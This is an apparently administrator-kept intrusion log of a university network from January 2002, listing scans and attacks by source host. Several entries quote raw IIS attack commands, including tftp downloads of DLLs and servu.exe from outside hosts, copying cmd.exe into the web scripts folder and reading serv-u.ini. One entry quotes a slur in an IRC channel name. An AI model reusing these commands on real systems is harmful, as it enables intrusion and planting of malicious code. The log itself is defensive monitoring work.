(ABoulogne-103-1-4-211.abo.wanadoo.fr) scannet for port 21 2002/01/20-16:45:57.90 64.214.30.92 (irc.east.gblx.net) scan several ips, 1 pkt to random high number port, all day long 2002/01/20-16:49:53.86 199.73.33.11 (Verio, Inc,CO,US) scan several ips, 1 pkt to random high number port 2002/01/20-17:09:49.16 194.67.57.41(f11.mail.ru) scan several ips, 1 pkt to random high number port 2002/01/20-17:53:01.67 62.119.28.105 (www5.aname.net) scan several ips, 1 pkt to random high number port, all day long 2002/01/20-18:08:40.05 209.195.62.45 (Comstar Communications Corporation,GA,US) scan several ips, 1 pkt to random high number port 2002/01/20-18:13:44.28 61.177.61.242 (CHINANET Jiangsu province network) 1. attack pc w/IIS server with commadn: 2002/01/20-18:13:44.28 61.177.61.242 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.232.9.225%20GET%20Admin.dll%20c:\Admin.dll 2002/01/20-18:53:06.26 203.198.189.51 (ipvpn064051.netvigator.com) scannet for port 1433 2002/01/20-21:33:38.36 62.211.25.77 (Telecom Italia Net,IT) scannet for port 111 - rstatd 2002/01/20-22:05:29.93 195.54.102.4 (ircu.bredband.com) scan several ips, 1 pkt to random high number port 2002/01/21-00:37:30.34 203.106.79.37 (TMnet Telekom Malaysia) scannet for ports 21,23 2002/01/21-00:41:21.03 200.12.166.34 (at XOLO.CONABIO.GOV.MX maybe?) scannet for port 111,23 - rstatd 2002/01/21-00:53:39.07 61.132.13.120(CHINANET Jiangsu province network,CN) multiple tries to connect to 132.235.1.35 ports 80,21 2002/01/21-02:06:59.17 210.186.104.25 (TMnet Telekom Malaysia, MY) scannet for ports 21,23 2002/01/21-02:14:35.22 210.186.104.25 (TMnet Telekom Malaysia,MY) scannet for port 21 2002/01/21-02:30:21.06 203.197.214.121 (Leased line - CMC Limited, New Delhi,IN) scannet for port 111,23 - rstatd 2002/01/21-02:36:53.23 211.43.165.212 (korea crap) attack local freenet w/ port 111 buff overflow attack - ttdbserverd 2002/01/21-03:18:08.37 61.147.44.202 (CHINANET Jiangsu province network) try to use 132.235.1.70 as dnsserver 2002/01/21-06:17:42.95 216.40.214.203 (mail.bigtimee.com) scan several ips, 1 pkt to random high number port 2002/01/21-07:40:24.70 65.198.68.56 (netmapper.research.lumeta.com) scannet for port 33435 2002/01/21-08:21:36.18 205.158.121.166 (TCS Global/INTESOLV,CA,US)scannet for ports 445 139 2002/01/21-11:10:21.71 213.51.203.171 (cc139034-c.ensch1.ov.nl.home.com) start of file transfers to/from hacked machines 2002/01/21-11:46:27.06 213.51.203.154 (cc139034-b.ensch1.ov.nl.home.com) start of file transfers to/from hacked machines 2002/01/21-14:58:05.78 131.174.118.65 (catv8065.extern.kun.nl) start of file transfers to/from hacked machines 2002/01/21-15:11:10.29 128.2.161.177 (CREWINGQ.RES.CMU.EDU) start of file transfers to/from hacked machines 2002/01/21-15:59:16.15 80.13.242.62 (AAmiens-104-1-2-62.abo.wanadoo.fr) connect to 2 networked printes on port 21, 137 2002/01/21-16:22:33.68 213.51.203.171 (cc139034-c.ensch1.ov.nl.home.com) 1. attack pc w/IIS server with commadn: 2002/01/21-16:22:33.68 213.51.203.171 (cc139034-c.ensch1.ov.nl.home.com) 2. tftp+-i+213.51.203.171+rundll.sys+c:\inetpub\iissamples\default\config\rundll.sys 2002/01/21-16:53:12.66 213.99.117.24 (213-99-117-24.uc.nombres.ttd.es) attemp to logon to 132.235.1.1 usigns stolen passwds 2002/01/21-17:14:35.21 213.99.117.24 (213-99-117-24.uc.nombres.ttd.es) portscan 132.235.1.1 2002/01/21-17:30:54.67 65.198.68.240 (h65-198-68-240.lumeta.com) scannet for port 33435 2002/01/21-18:34:25.99 128.2.198.11 (HALPORT.PC.CS.CMU.EDU) scannet for port 33435 2002/01/21-19:00:03.96 168.122.240.8 (bays030-0201-dhcp008.bu.edu) start of file transfers to/from hacked machines 2002/01/21-19:32:34.87 216.3.1.111 (dyn046-ts9a.athens.frognet.net) portscan 132.235.1.1 on ports 445 137 139 2002/01/21-19:52:35.37 141.158.74.103 (pool-141-158-74-103.pitt.east.verizon.net)_ scannet for port 33435 2002/01/21-21:09:13.79 61.132.13.120 (CHINANET Jiangsu province network,CN) multiple tries to connect to 132.235.1.35 ports 80 2002/01/21-22:05:27.91 129.125.103.44 (flits103-44.flits.rug.nl) start of file transfers to/from hacked machines 2002/01/21-23:22:01.15 213.84.251.135 (gloop.xs4all.nl) start of file transfers to/from hacked machines 2002/01/21-23:53:21.90 213.46.124.61 (d124061.upc-d.chello.nl) start of file transfers to/from hacked machines 2002/01/22-00:54:04 210.184.3.134 (Toppan Forms Ltd,HK) scannet for port 80 2002/01/22-01:51:08.48 213.46.141.241 (d141241.upc-d.chello.nl) start of file transfers to/from hacked machines 2002/01/22-05:00:29.22 213.24.31.184 (host184.gspuniver.ru) scannet for port 137 2002/01/22-05:56:54.89 213.24.31.184:137 (host184.gspuniver.ru) scannet for port 137 2002/01/22-06:16:48.65 65.208.146.150 (Syntex Networks,CA,US) scannet for port 25 2002/01/22-08:58:59.67 209.43.49.80 (iq-ind-as002-80.iquest.net) probe ports 4366[1,2,3] on 132.235.3.133 2002/01/22-10:16:39.25 204.152.186.58 (proxy8.monitor.dal.net) scan ports 1080 3128 8080 81 8081 23 twice on 1 machine. 2002/01/22-11:15:09.02 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/01/22-11:23:02.32 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/01/22-11:23:33.36 65.198.68.56 (netmapper.research.lumeta.com) scannet for port 33435 2002/01/22-12:10:33.91 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) scannet for port 139 2002/01/22-12:11:06.10 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) portscan specific ips on 445,139,80 2002/01/22-12:12:32.41 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) scannet for port 80 2002/01/22-13:20:03.48 61.177.61.242 (CHINANET Jiangsu province network) 1. attack IIS server on pcs with cmd 2002/01/22-13:20:03.48 61.177.61.242 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.232.9.225%20GET%20Admin.dll%20c:\Admin.dll 2002/01/22-13:20:03.48 61.177.61.242 (CHINANET Jiangsu province network) 3. until 2002/01/22-17:45:10.01 2002/01/22-14:18:38.77 206.34.8.50 (wxs.silval.fr.com) probe ports 111,21 on 132.235.3.133 2002/01/22-14:43:01.72 132.235.157.96 (dhcp-157-096.south-green.ohiou.edu) scannet for port 80 2002/01/22-15:04:00.47 131.211.67.101 (knagserver.geog.uu.nl) 1. attack IIS servers with cmds 2002/01/22-15:04:00.47 131.211.67.101 (knagserver.geog.uu.nl) 2. +ping+-v+udp+-n+2000+-l+62000+-w+0+217.81.155.49 2002/01/22-15:28:57.73 132.235.157.96 (dhcp-157-096.south-green.ohiou.edu) scannet for port 80 again 2002/01/22-15:40:57.14 128.186.27.6:113 (dhcp2706.salley.fsu.edu) scan several ips, 1 pkt to random high number port 2002/01/22-17:23:47.91 68.39.44.15 (bgp581983bgs.eatntn01.nj.comcast.net) scannet for port 33435 2002/01/22-17:52:03.98 200.226.136.143 (143.136.226.200.in-addr.arpa.ig.com.br) scan several ips, 1 pkt to random high number port 2002/01/22-18:52:08.91 64.7.3.122 (whatexit.org) scannet for port 33435 2002/01/22-19:11:52.38 61.177.251.184 (CHINANET Jiangsu province network) pound on 132.235.1.35:80 for some reason 2002/01/22-19:11:54.12 61.132.13.120 (CHINANET Jiangsu province network) pound on 132.235.1.35:80 for some reason 2002/01/23-00:36:06.56 64.232.202.4 (ns1.starlink.com) scannet for por 21 2002/01/23-01:02:04.34 210.19.26.130 (MESINIAGA BERHAD,MY) scannet for port 515 2002/01/23-01:38:09.79 65.105.223.11 (XO Communications,CA,US) sscannet for port 515 2002/01/23-02:59:13.69 148.243.244.3 (na-148-243-244-3.na.avantel.net.mx) scannet for port 22 2002/01/23-04:12:23.96 65.92.139.103 (HSE-Montreal-ppp335588.sympatico.ca) scannet for por 21 2002/01/23-07:12:42.74 132.235.238.1:1056 (admin.memaud.ohiou.edu) scannet for port 38293 2002/01/23-08:01:47.71 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/01/23-08:17:24.59 132.235.90.7:1031 (OUCOM - ohiou.edu) scan net for port 38293 2002/01/23-09:10:55.52 217.225.62.198 (pD9E13EC6.dip.t-dialin.net) scannet for port 80 2002/01/23-09:11:23.62 217.225.62.198 (pD9E13EC6.dip.t-dialin.net) scannet for port 80 2002/01/23-12:28:35.32 80.13.216.171 (ALyon-202-1-6-171.abo.wanadoo.fr) scannet for port 80 2002/01/23-14:13:20.71 193.251.50.128 (ATuileries-101-1-2-128.abo.wanadoo.fr) scannet for port 1433 2002/01/23-14:53:15.01 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) scannet for port 139, 445 2002/01/23-14:55:28.48 132.235.94.25 (something.ohiou.edu - Sachin Jain) scannet for port 41524 2002/01/23-15:32:24.99 66.110.142.4 (adsl-66.110.142-4.globetrotter.net) scannet for port 21 2002/01/23-19:45:34.08 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) portscan selected ips 2002/01/23-19:56:47.84 204.60.155.137 (Southern New England Telephone,CT,US) scannet for port 80 2002/01/23-20:35:38.03 61.147.57.13 (CHINANET Jiangsu province network) pound on 132.235.1.35:80 for some reason 2002/01/23-20:39:31.03 61.177.251.58 (CHINANET Jiangsu province network) pound on 132.235.1.35:80 for some reason 2002/01/23-23:36:55.43 148.243.244.3 (na-148-243-244-3.na.avantel.net.mx) probe ports 23,22,21,25 on 132.235.16.101 2002/01/24-00:27:19.12 132.235.157.96 (dhcp-157-096.south-green.ohiou.edu) scannet fo rport 139 2002/01/24-00:44:33.70 132.235.157.96 (dhcp-157-096.south-green.ohiou.edu) portscan of multiple IPs, ports 3 thru .... 2002/01/24-01:18:47.40 62.122.0.89 (62-122-0-89.adsl.galactica.it) scannet for port 23, then port 111 on select ips 2002/01/24-02:27:20.78 213.225.76.89 (Jaren Kabel TV,NO) scannet for port 27374 2002/01/24-05:18:15.67 148.208.88.4 (Secretaria de Educacion e Investigacion Tecnologic,MX)scannet for port 23 2002/01/24-05:18:16.69 148.208.88.4 (Secretaria de Educacion e Investigacion Tecnologic) scannet for port 23 2002/01/24-05:48:18.30 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/01/24-06:47:55.17 202.102.9.10 (CHINANET Jiangsu province network,CN) 1. scannet for port 80, attack IIs w/ command 2002/01/24-06:47:55.17 202.102.9.10 (CHINANET Jiangsu province network,CN) 2. ftp%20-i%20132.236.33.90%20GET%20cool.dll%20c:\httpodbc.dll 2002/01/24-08:18:23.79 207.71.92.221 (shieldsup.grc.com) portscan 132.235.19.64 (requested from 207.71.92.193 ?)) 2002/01/24-08:27:32.95 24.114.52.28 (CPE002078ccb377.cpe.net.cable.rogers.com) scannet for port 6112 2002/01/24-08:27:33.99 24.114.52.28 (CPE002078ccb377.cpe.net.cable.rogers.com) scannet for port 3784 2002/01/24-09:53:09.67 128.121.247.121 (Verio, Inc.,CA,US) scannet for port 111 - statdx exploit 2002/01/24-11:59:40.23 217.228.98.46 (pD9E4622E.dip.t-dialin.net) scannet with ping 2002/01/24-12:01:06.75 217.228.98.46 (pD9E4622E.dip.t-dialin.net) scannet for port 80 2002/01/24-13:22:11.73 195.232.60.37 (fra-tgn-ozb-vty37.as.wcom.net) scannet for port 111 2002/01/24-16:09:59.57 217.225.57.16 (pD9E13910.dip.t-dialin.net) scannet for port 80 2002/01/24-16:50:46.89 208.185.156.65 (core3-core5-oc48.sjc2.above.net) scan several ips, 1 pkt to random high number port 2002/01/24-17:08:18 217.128.45.211 (ABoulogne-103-1-4-211.abo.wanadoo.fr) scannet for port 21 2002/01/24-17:39:23.47 138.89.113.133 (pool-138-89-113-133.mad.east.verizon.net) scannet for prt 33435 UDP 2002/01/24-19:38:54.11 61.177.251.58 (CHINANET Jiangsu province network) pound on 132.235.1.35:80 for some reason 2002/01/25-02:30:28.04 212.186.231.163 (cha212186231163.chello.fr) scannet for port 21, anon ftp attacks 2002/01/25-04:45:48.47 80.130.205.184 (p5082CDB8.dip.t-dialin.net) scannet for port 21 2002/01/25-09:24:16.04 62.211.25.154 (Telecom Italia Net,IT) scannet fo rport 111 - rstatd attack 2002/01/25-12:12:07 193.252.2.63 (ANeuilly-101-1-4-63.abo.wanadoo.fr) scannet for port80 2002/01/25-16:48:34.09 200.202.28.153 (dial-1-153.tro.matrix.com.br) attack packers, break in, setup irc server channel n1ggar 2002/01/25-17:17:26.54 132.211.72.140 (usager72-140.hec.ca) 1. attack IIS servers on net with command: 2002/01/25-17:17:26.54 132.211.72.140 (usager72-140.hec.ca) 2. tftp%20-i%20132.211.72.140%20GET%20cool.dll%20c:\httpodbc.dll 2002/01/25-19:13:31.55 213.46.44.226 (d44226.upc-d.chello.nl) scannet for port 21 2002/01/25-22:44:56.17 207.232.171.35 (State of South Carolina,SC,US) 1. attack IIS server on 132.235.15.151 with command" 2002/01/25-22:44:56.17 207.232.171.35 (State of South Carolina,SC,US) 2. cmd.exe?/c+c:\inetpub\scripts\tools\bar.bat 2002/01/26-03:02:56.11 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) attack every hour ports 8080,81,3128,54 on 132.235.15.151 2002/01/26-06:25:20 63.104.243.41 (agnewbennett.fw.ldl.net) scannet for port 22 2002/01/26-12:22:25.22 209.122.64.204 (RCN Corporation,NJ,US) scannet for port 21 2002/01/26-12:46:34.05 216.35.116.92 (si3002.inktomi.com) scan port 8000 on 132.235.1.6 2002/01/26-13:44:06.74 208.186.96.6 (news.csolutions.net) scan random ips on net, 1 packer per ip, to high number port 2002/01/26-15:50:28.97 207.232.171.35 (State of South Carolina,SC,US) 1. attack IIS server on 132.235.15.151 with command" 2002/01/26-15:50:28.97 207.232.171.35 (State of South Carolina,SC,US) 2. cmd.exe?/c+c:\inetpub\scripts\tools\bar.bat 2002/01/26-15:54:29.15 217.85.45.120 (pD9552D78.dip.t-dialin.net) 1. 1. attack IIS servers via buff/overflwo with command 2002/01/26-15:54:29.15 217.85.45.120 (pD9552D78.dip.t-dialin.net) 2. md.exe?/c+c:\inetpub\scripts\tools\bar.bat 2002/01/26-15:54:29.15 217.85.45.120 (pD9552D78.dip.t-dialin.net) 3. tftp.exe+-i+217.85.45.120+GET+test.txt+c:\inetpub\wwwroot\_vti_pvt\test.txt 2002/01/26-15:54:29.15 217.85.45.120 (pD9552D78.dip.t-dialin.net) 4. tftp.exe+-i+217.85.45.120+GET+test.txt+c:\inetpub\wwwroot\_vti_pvt\test.txt 2002/01/26-22:44:54 12.234.139.210 (12-234-139-210.client.attbi.com) scannet for port80 2002/01/26-22:57:43 63.124.248.132 (host69-132.prestige.net) scannet for port 80 2002/01/26-23:42:31.36 68.41.39.62 (bgp943439bgs.canton01.mi.comcast.net) scan port 8080 on 132.235.1.11 2002/01/26-23:53:32.02 67.218.71.146 (1Cust146.tnt11.sfo3.da.uu.net) 1. attack IIS server on 132.235.19.97with command 2002/01/26-23:53:32.02 67.218.71.146 (1Cust146.tnt11.sfo3.da.uu.net) 2. copy%20c:\winnt\system32\cmd.exe%20c:\inetpub\scripts\w3svc.exe 2002/01/27-07:23:27 137.250.50.132:22 (University of Augsburg,DE) scannet for port22 2002/01/27-19:55:45.98 210.242.87.35 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 23 2002/01/28-01:41:16.57 24.145.143.5 (user-0c933o5.cable.mindspring.com) scan 132.235.1.1 for port 119,563 2002/01/28-01:52:26.18 12.39.105.232 (POINT2POINT COMMUNICATIONS,TX.US) scannet for port 21 2002/01/28-07:04:48.39 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) port scan 132.235.15.151 on port 8000,81,54,1080,3128 2002/01/28-07:39:02.32 68.10.72.142 (ip68-10-72-142.hr.hr.cox.net) conn to hacker port on 132.235.15.151 2002/01/28-08:23:39.24 65.165.128.102 (BUDGET MANAGEMENT LLC,NM,US) scan 132.235.15.151 ports 23,1080 2002/01/28-09:58:15.11 24.27.237.92 (24.27.237.92.merrittisland-ubr-a.cfl.rr.com) scannet for port 80 2002/01/28-12:48:57.64 213.245.238.64 (cha213245238064.chello.fr) 1. attack IIS on 132.235.16.217 with command: 2002/01/28-12:48:57.64 213.245.238.64 (cha213245238064.chello.fr) 2 type+c:\Inetpub\wwwroot\_vti_pvt\serv-u.ini+1 2002/01/28-12:48:57.64 213.245.238.64 (cha213245238064.chello.fr) scannet for port 80 2002/01/28-13:09:44.05 237.92 (24.27.237.92.merrittisland-ubr-a.cfl.rr.com) scannet for port 80 2002/01/28-13:12:27.89 24.154.37.181 (acs-24-154-37-181.zoominternet.net) access hacker ftp deamon on 132.235.16.217 2002/01/28-13:12:27.89 24.154.37.181 (acs-24-154-37-181.zoominternet.net) access hacker ftp deamon on 132.235.16.217 2002/01/28-17:11:08.18 200.202.28.242 (dial-1-242.tro.matrix.com.br) hacker back breaking in packers 2002/01/28-18:10:53.07 217.85.101.175 (pD95565AF.dip.t-dialin.net) scannet fo rport 21 2002/01/28-23:10:32.36 132.248.225.83 (Universidad Nacional Autonoma de Mexico,MX) 1. attack IIS server on 132.235.19.158 with command: 2002/01/28-23:10:32.36 132.248.225.83 (Universidad Nacional Autonoma de Mexico,MX) 2. tftp%20-i%20132.248.225.83%20GET%20cool.dll%20d:\httpodbc.dll 2002/01/29-00:45:11.56 62.42.7.176 (VA1-1B-u-0943.mc.onolab.com) scannet for port 21 2002/01/29-07:19:56.08 217.85.101.175 (D95565AF.dip.t-dialin.net) scannet for port 21 2002/01/29-08:05:20.80 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) scannet for ports 80,139,137,445 2002/01/29-10:07:26.27 132.235.224.17 (share.cofa.ohiou.edu) scannet for port 80 2002/01/29-10:48:10.35 204.101.179.35 (WorldLinx Telecommunications, Inc.,Ontario,CA) scan random ips on net, 1 packer per ip, to high number port 2002/01/29-10:50:40.19 129.21.106.51:3389 (res106a-051.rh.rit.edu) scan random ips on net, 1 packer per ip, to high number port 2002/01/29-13:08:53.08 62.211.188.232 (TINIT-ADSL-LITE,IT) scannet for port 111, buff overflow attack rstatd 2002/01/29-14:40:39.76 62.211.25.100 (Telecom Italia Net,IT) scannet for port 111, rstatd attack 2002/01/29-15:24:33.60 209.148.64.171 (skimogul.look.ca) scannet for port 6112 2002/01/29-15:24:33.60 209.148.64.171 (skimogul.look.ca) scannet for port 6112, buff overflow attack 2002/01/29-15:40:32.25 64.81.213.144 (dsl081-213-144.nyc2.dsl.speakeasy.net) scannet for port 21 2002/01/29-16:08:18.52 66.92.175.131 (dsl092-175-131.wdc1.dsl.speakeasy.net)scannet for port 22 2002/01/29-16:32:45.86 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524, 137,139 2002/01/29-19:03:15.82 204.101.179.35 (...rocler.qc.ca) scan random ips on net, 1 packer per ip, to high number port 2002/01/29-23:58:25.60 156.34.219.175 (fctn1-2991.nb.vibe.net) scannet for port 80 2002/01/30-02:03:38.69 204.101.179.28 (web.rocler.qc.ca) scan random ips on net, 1 packer per ip, to high number port 2002/01/30-07:47:26.39 161.58.238.4:25 (iiswebsites.com) scan random ips on net, 1 packer per ip, to high number port, 5ips/hr 2002/01/30-09:07:09.79 195.92.95.61 (ariston.netcraft.com) scannet for prt 80 2002/01/30-11:30:00.83 200.215.1.1 (BrT-f1-1-0.fns300.telesc.net.br) scan random ips on net, 1 packer per ip, to high number port 2002/01/30-14:22:19.66 195.70.147.22:21 (server.juristic.cz) scannet for port 21-SYN FIN scan 2002/01/30-14:34:57.05 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) scannet for port 80 2002/01/30-14:44:24.01 204.60.164.66 (Southern New England Telephone,CT,US) 1. attack 132.235.18.156 via IIS w/command: 2002/01/30-14:44:24.01 204.60.164.66 (Southern New England Telephone,CT,US) 2. tftp+"-i"+80.135.61.104+GET+servu.exe+c:\WNNT\system32\Com\servu.exe 2002/01/30-14:44:24.01 204.60.164.66 (Southern New England Telephone,CT,US) 3. tftp+"-i"+80.135.61.104+GET+login.txt+c:\ASFRoot\login.txt 2002/01/30-15:12:59.79 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) 1. scannet for IIS server with cmd.exe execute scan 2002/01/30-15:12:59.79 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) 2. attack w/ tftp -i 132.235.162.112 GET cool.dll e:\httpodbc.dll ttpodbc.dll 2002/01/30-20:40:24.64 132.235.1.49 (odd33.cs.ohiou.edu) user jprofitt portscanned 216.153.217.132 logged in from 24.31.172.209 2002/01/30-21:34:35.37 66.79.158.80 (qepod00-alias.C10-0.SJC.ivmg.net) 20 packets per port UDP, ports 20046-20490 2002/01/30-23:04:55.90 64.35.105.238 (9 Net Avenue, Inc.,NJ,US) scannet for port 22 2002/01/31-02:51:29.11 64.23.48.70 (SkyNetWEB,MARYLAND,US) scannet w/ 1 packet to high num port per ip. slow scan 2002/01/31-04:16:18.44 61.147.52.71 (CHINANET Jiangsu province network,CN) bang on 132.235.1.35:21 2002/01/31-07:12:26.54 24.169.15.61 (cm-24-169-15-61.nycap.rr.com) scannet for port 1433,445,139 2002/01/31-07:17:30.81 64.215.166.34 (Akamai Technologies/S.F.,MA,US) cannet w/ 1 packet to high num port per ip. slow scan 2002/01/31-07:17:53.31 172.188.28.159 (ACBC1C9F.ipt.aol.com) sc annet w/ 1 packet to high num port per ip. slow scan 2002/01/31-07:23:07.85 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) slowscan of net for ports 137,524 (1 ip per hr or less) 2002/01/31-07:51:22.46 61.147.45.86 (CHINANET Jiangsu province network,CN) multiple tries to use 132.235.1.70 as dns server 2002/01/31-08:12:05.08 200.223.255.197 (AComite Gestor da Internet no Brasil,BR) scannet w/ 1 packet to high num port per ip. slow scan 2002/01/31-09:35:10.41 216.133.249.14 (proxy4.monitor.dal.net) scan 2 ips for ports 23, 80, 1080, 8080, 8081,81 2002/01/31-11:31:27.40 63.219.148.233 (jcarroll.adsl.st.staffnet.com) scannet w/ 1 packet to high num port per ip. slow scan 2002/01/31-11:39:57.98 66.28.14.59 (Cogent Communications,WASH/.DC,US) scannet for port 80, fp30reg.dll access 2002/01/31-13:40:46.21 62.119.28.105 (www5.aname.net) scannet w/ 1 packet to high num port per ip. slow scan 2002/01/31-17:06:56.65 157.238.46.35 (Verio, Inc.CO,US) annet w/ 1 packet to high num port per ip. slow scan 2002/01/31-18:38:01.34 193.110.95.1 (minotor.spale.com) sc annet w/ 1 packet to high num port per ip. slow scan 2002/01/31-21:26:23.63 149.142.147.130:21(UCLA Campus Network Services) scannet for port 21 2002/01/31-22:42:50.87 172.130.237.188 (AC82EDBC.ipt.aol.com) sc annet w/ 1 packet to high num port per ip. slow scan 2002/01/31-23:14:52.45 68.41.39.62 (bgp943439bgs.canton01.mi.comcast.net) scannet for port 8080